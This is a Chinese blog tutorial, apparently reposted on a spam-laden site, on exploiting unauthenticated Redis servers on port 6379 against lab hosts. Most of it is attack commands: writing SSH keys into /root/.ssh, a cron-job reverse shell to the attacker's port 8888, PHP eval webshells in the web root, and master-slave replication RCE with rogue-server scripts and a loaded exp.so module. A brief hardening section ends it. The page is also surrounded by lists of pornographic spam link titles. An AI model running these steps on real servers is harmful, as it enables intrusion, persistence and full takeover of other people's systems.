日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

Redis未授权访问漏洞记录(端口:6379)

發(fā)布時間:2025/3/15 数据库 23 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Redis未授权访问漏洞记录(端口:6379) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

目錄

Redis

掃描

未授權(quán)登錄以及利用

寫入SSH公鑰,進行遠程登錄

定時任務(wù)反彈shell

寫入一句話木馬?

其它一句話木馬

?

寫入/etc/passwd文件

利用主從復(fù)制RCE

?

本地Redis主從復(fù)制RCE反彈shell

防御方法


Redis

Redis是一個開源的使用ANSI C語言編寫、支持網(wǎng)絡(luò)、可基于內(nèi)存亦可持久化的日志型、Key-Value數(shù)據(jù)庫,并提供多種語言的API。Redis默認使用?6379?端口。

未授權(quán)訪問漏洞

那么Redis的未授權(quán)訪問漏洞是如何產(chǎn)生的呢?由于Redis默認使用6379號端口,并且Redis默認是空密碼而且默認允許遠程連接。一些粗心的網(wǎng)絡(luò)管理員在安裝好Redis后,并沒有去修改他的默認端口,而且也沒有給他設(shè)置密碼的話。這就讓黑客有了可乘之機,黑客可以遠程連接到該數(shù)據(jù)庫。并且,如果Redis是以root身份運行的話,那么黑客就可以通過Redis數(shù)據(jù)庫進行寫入任何文件進行提權(quán),從而操控該服務(wù)器。

這里我們拿一個靶機做實驗,該靶機存在Redis未授權(quán)訪問漏洞,于是,我們在windows端遠程連接該靶機。

攻擊機:192.168.10.27

靶機:192.168.10.32

掃描

我們直接用nmap進行掃描是發(fā)現(xiàn)不了6379漏洞的,因為nmap默認只會掃描前1000個端口。因為這里我們已經(jīng)知道靶機開放了6379端口,所以就直接指定端口進行掃描。

未授權(quán)登錄以及利用

Nmap掃描后發(fā)現(xiàn)主機的6379端口對外網(wǎng)開放,就可以用本地Redis遠程客戶端連接服務(wù)器了,連接后可以獲取Redis敏感數(shù)據(jù),也可以寫入數(shù)據(jù)。我們可以用windows或者linux下的redis客戶端進行遠程登錄,這里我就用windows遠程登錄了,linux懶得安裝。

redis-cli.exe -h 192.168.10.32 #登錄

redis數(shù)據(jù)庫的一些基本操作?

info #查看redis的信息和服務(wù)器信息 flushall 刪除所有數(shù)據(jù) del key 刪除鍵為key的數(shù)據(jù) get key 獲得參數(shù)key的數(shù)據(jù)

redis數(shù)據(jù)庫的認證

auth?密碼

寫入SSH公鑰,進行遠程登錄

關(guān)于SSH公私鑰驗證,我就不多講了,傳送門——>?ssh公私鑰驗證? ?,文章中是在Linux下生成公私鑰。

今天我要教的是在windows下利用XShell生成公私鑰,然后驗證登錄。

打開XShell—>工具—>新建用戶密鑰生成向?qū)А?gt;下一步—>下一步

我這里就用默認名稱,密碼為空密碼,然后下一步—>?是?

保存為文件,然后完成。然后公鑰就會被保存到指定的路徑下,我這里保存到了?redis 客戶端的目錄下,因為待會便于傳輸。我們打開?id_rsa_2048.pub ,在其開頭和結(jié)尾加入幾個回車換行,避免待會寫入redis數(shù)據(jù)庫中和Redis里其他緩存數(shù)據(jù)混合?。

注意:一定要在公鑰的開頭和結(jié)尾加入幾個換行,不然會出錯!!!

然后我們現(xiàn)在如何將這個公鑰傳送到靶機的 /root/.ssh/?目錄下,并且重命名為??authorized_keys 。

執(zhí)行下面的操作

type id_rsa_2048.pub | redis-cli -h 192.168.10.32 -x set j  #查看id_rsa_2048.pub的文件內(nèi)容,并且鍵設(shè)置為 j redis-cli -h 192.168.10.32 #登陸到該redis數(shù)據(jù)庫 config set dir /root/.ssh #設(shè)置redis的工作路徑為/root/.ssh config set dbfilename authorized_keys #設(shè)置保存文件名authorized_keys save #保存#上面命令的意思就是,將我們id_rsa_2048.pub的文件內(nèi)容寫入到authorized_keys文件中,并且存放到/root/.ssh 目錄下

然后我們現(xiàn)在就可以用XShell以私鑰連接該主機了?

可以看到我們已經(jīng)登陸上了。并且可以在 /root/.ssh/?目錄下看到我們上傳的 authorized_keys 文件,正是由于這個文件的存在,我們才可以在本地用私鑰登錄。

定時任務(wù)反彈shell

我們可以將 linux 反彈 shell 的命令寫入定時任務(wù)中,這樣,我們就可以接收到redis服務(wù)器反彈過來的shell了

我們客戶端先接收一個端口

nc -lvp 8888 #監(jiān)聽8888端口

然后執(zhí)行下面的命令

redis-cli -h 192.168.10.32 #登陸到redis數(shù)據(jù)庫 set d "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.10.27/8888 0>&1\n\n" #意思是每隔一分鐘,向192.168.10.27的8888端口反彈shell config set dir /var/spool/cron #設(shè)置工作目錄 config set dbfilename test #設(shè)置文件名,當前用戶叫啥就得命名為啥,當前用戶為test save #保存成文件#上面這幾行命令的意思就是將 "\n\n*/1 * * * * * /bin/bash -i>&/dev/tcp/192.168.10.27/8888 0>&1\n\n" 這條命令寫入test文件中,并且存放在/var/spool/cron目錄下

可以看到,我們這邊已經(jīng)收到反彈回來的shell了?

寫入一句話木馬?

寫入一句話木馬需要我們知道網(wǎng)站的根目錄相對于服務(wù)器的絕對路徑。但是這個靶機網(wǎng)站的根目錄相對于服務(wù)器的絕對路徑很奇葩。不是普通的在? /var/www/html?下,而是在? /var/www/html/dedecms/uploads? 這個目錄下。

執(zhí)行下列命令

redis-cli -h 192.168.10.32 set one "\n\n\n<?php @eval($_POST['c']);?>\n\n\n" config set dir ?/var/www/html/dedecms/uploads config set dbfilename webshell.php save

然后用菜刀連接

可以看到,已經(jīng)連接成功了!

其它一句話木馬

config set dir /var/www/html/ //切換目錄到網(wǎng)站的根目錄set x "\n\n\n<?php phpinfo();?>\n\n\n" //寫入惡意代碼phpinfo()set xx "\n\n\n<?php @eval($_POST['1']);?>\n\n\n" //寫入一句話木馬config set dbfilename a001.php //磁盤中生成木馬文件a001.phpsave //進行保存

?可以去靶機看一下

可以看到 被成功寫入了

檢查webshell

kali開啟apache2

vi /etc/apache2/ports.conf

修改默認端口為8080

保存退出

啟動apache2服務(wù)

/etc/init.d/apache2 start

進行訪問 可以看到是成功的?

寫入/etc/passwd文件

寫入 /etc/passwd?文件,這需要使用?root?權(quán)限才可以寫入。

Redis客戶端:?https://pan.baidu.com/s/1igxEuqTwq77afUQ-LQTV0w? 提取碼: d1hn?

利用主從復(fù)制RCE

之前寫入webshell 基本是利用crontab、ssh key、webshe‖這樣的文件都有一定容錯性,再加上 crontab和ssh服務(wù)可以說是服務(wù)器的標準的服務(wù),所以在以前,這種通過寫入文件的 getshell方式基本就可以說是很通殺了

但隨著現(xiàn)代的服務(wù)部署方式的不斷發(fā)展,組件化成了不可逃避的大趨勢,docker就是這股風(fēng)潮下的產(chǎn)物之一,而在這種部署模式下,一個單一的容器中不會有除 redis以外的任何服務(wù)存在,包括sh和 crontab,再加上權(quán)限的嚴格控制,只靠寫文件就很難再 getshell了,在這種情況下,我們就需要其他的利用手段了

漏洞存在于4.X、5.X版本中,簡單來講就是

攻擊者(主機)寫一個so文件,然后通過 FULLRESYNC(全局)同步文件到受害人(從機)上。

下載安裝4.0.8的版本

一樣的配置 改bind+改no

然后進行啟動

./src/redis-server redis.conf

設(shè)置密碼

config set requirepass a002

下載兩個腳本

https://github.com/n0b0dyCN/redis-rogue-server //未授權(quán) https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server //Redis有密碼

目標靶機是不可以開啟安全模式的

遠程登錄

攻擊機上執(zhí)行 進行遠程連接靶機

python3 redis_rogue_server.py -rhost 192.168.175.162 -lhost 192.168.175.161 -passwd a002

他這里問你

i:直接拿到shell

還是r:反彈shell

上面就是拿shell

下面搞一搞 反彈shell

選r 攻擊機的IP +開啟監(jiān)聽端口

python進去pty

python3 -c "import pty;pty.spawn('/bin/bash')"

本地Redis主從復(fù)制RCE反彈shell

但是 如果目標機器僅僅允許本地進行登錄的時候

這個時候,我們可以通過配合其他漏洞,從目標本地登錄 redis。然后手動執(zhí)行腳本內(nèi)寫死的一些命令

將靶機 Redis作為從機,將攻擊機器設(shè)置為主機

然后攻擊機器會自動將一些惡意so文件同步給目標機器(從機),從而來實現(xiàn)對目標機器的遠程命令執(zhí)行。

還是用這兩個腳本

https://github.com/n0b0dyCN/redis-rogue-server //未授權(quán) https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server //Redis有密碼

但是要說一下

將 redis-rogue-server的exp.so文件復(fù)制到 Awsome文件夾中使用,因為exp.so帶 system模塊

開啟監(jiān)聽

攻擊機開啟主服務(wù)器

python3 redis_rogue_server.py -v -path exp.so

然后去靶機上

查看模塊 可以看到是沒有的可用的模塊

module list

config set dir /tmp //一般tmp目錄都有寫權(quán)限,所以選擇這個目錄寫入 config set dbfilename exp.so //設(shè)置導(dǎo)出文件的名字 這里就是創(chuàng)建一個空文件 slaveof 192.168.175.161 15000 //進行主從同步,將惡意so文件寫入到tmp文件 //端口可以自定義

?然后就可以看到攻擊機這邊開始了同步

?

關(guān)閉主從同步

slaveof NO ONE module load ./exp.so //加載寫入的so文件模塊 module list //?查看惡意的so文件有沒有寫入成功

執(zhí)行反彈shell

system.rev 192.168.175.161 9999

就是沒有回顯

然后去攻擊機那邊進行查看?

可以看到已經(jīng)拿到了

python進入pty

python3 -c "import pty;pty.spawn('/bin/bash')"

還可以用另外一種方式

直接執(zhí)行命令

system.exec "id"

防御方法

到redis安裝目錄下,配置redis.conf文件:
1、默認只對本地開放
bind 127.0.0.1
2、添加登陸密碼

>>修改 redis.conf 文件,添加
requirepass? mypasswd
3、在需要對外開放的時候修改默認端口(端口不重復(fù)就可以)
port 2344

4、以低權(quán)限運行 Redis 服務(wù)(重啟redis才能生效)

>>為 Redis 服務(wù)創(chuàng)建單獨的用戶和家目錄,并且配置禁止登陸

5、最后還可以配合iptables限制開放

總結(jié)

以上是生活随笔為你收集整理的Redis未授权访问漏洞记录(端口:6379)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 日大逼 | 日本午夜一级 | 日韩欧美大片在线观看 | 青青草视频成人 | 国产精品偷伦视频免费观看了 | 青青视频免费在线观看 | 久热精品在线观看 | 国产精品无码网站 | 国产精品成人国产乱一区 | 亚洲精品人 | 亚洲男人天堂2019 | 亚洲国产精品成人无久久精品 | 日本aaa视频 | 中文字幕在线观看你懂的 | 国产精品视频1区 | 亚洲乱码国产乱码精品精98午夜 | 在线视频观看免费 | 免费毛片在线播放免费 | 欧美无吗 | 无码人妻aⅴ一区二区三区玉蒲团 | 制服一区二区 | 日剧再来一次第十集 | 被扒开腿一边憋尿一边惩罚 | 老色批网站 | 国产网站91 | 国产成人三级在线观看视频 | 巨骚综合| 国产xxxx视频 | 天天操导航 | 国产精品久久久久久久久久久久 | 国产美女菊爆在线播放APP | 一区二区黄色 | 亚洲精品天堂成人片av在线播放 | 日韩三级国产精品 | 成人入口 | 黄瓜视频在线播放 | 日韩欧美一区二区三区免费观看 | jlzzjlzz欧美大全 | 欧美人在线 | 中文字幕一区二区三区电影 | 18禁免费无码无遮挡不卡网站 | 色偷偷免费 | 国语对白做受按摩的注意事项 | 美国黄色一级大片 | 久久久全国免费视频 | 久久艹av| 欧美黄色小视频 | 久久丫精品国产亚洲av不卡 | 成人网免费 | 日本日韩欧美 | 欧美丰满熟妇bbb久久久 | 欧美成人综合网站 | 一区二区三区不卡视频在线观看 | a视频免费在线观看 | 天天想你免费观看完整版高清电影 | 先锋av在线资源 | 97国产精品| 农村少妇| 在线不卡 | 一级视频免费观看 | 精品深夜av无码一区二区老年 | 日韩在线国产 | 欧美日韩国产亚洲一区 | 欧美极品在线播放 | 亚洲视频h| 久久婷婷影视 | 国产一二精品 | 国产高清二区 | 国产欧美日韩综合精品一区二区 | 国产女人和拘做受视频免费 | k8经典成人理伦片 | 中文字幕免费看 | 久久99久久精品 | www.色播| 久久久一本| 黄在线网站 | 国产色一区二区 | youjizz麻豆| 美女张开腿流出白浆 | 成人天堂网 | 久久99一区 | 在线91观看 | 尤物精品 | 18深夜在线观看免费视频 | 色七七亚洲 | 中文字幕av专区 | 欧美激情一区二区三区免费观看 | 熟妇毛片| 91超碰免费在线 | 天天操天天摸天天干 | 波多野结衣日韩 | 国产精品久久久久蜜臀 | 免费在线观看污网站 | 水蜜桃亚洲精品 | 香蕉啪啪网| fc2ppv在线播放 | 国产免费大片 | 欧美日韩精| 牛牛免费视频 |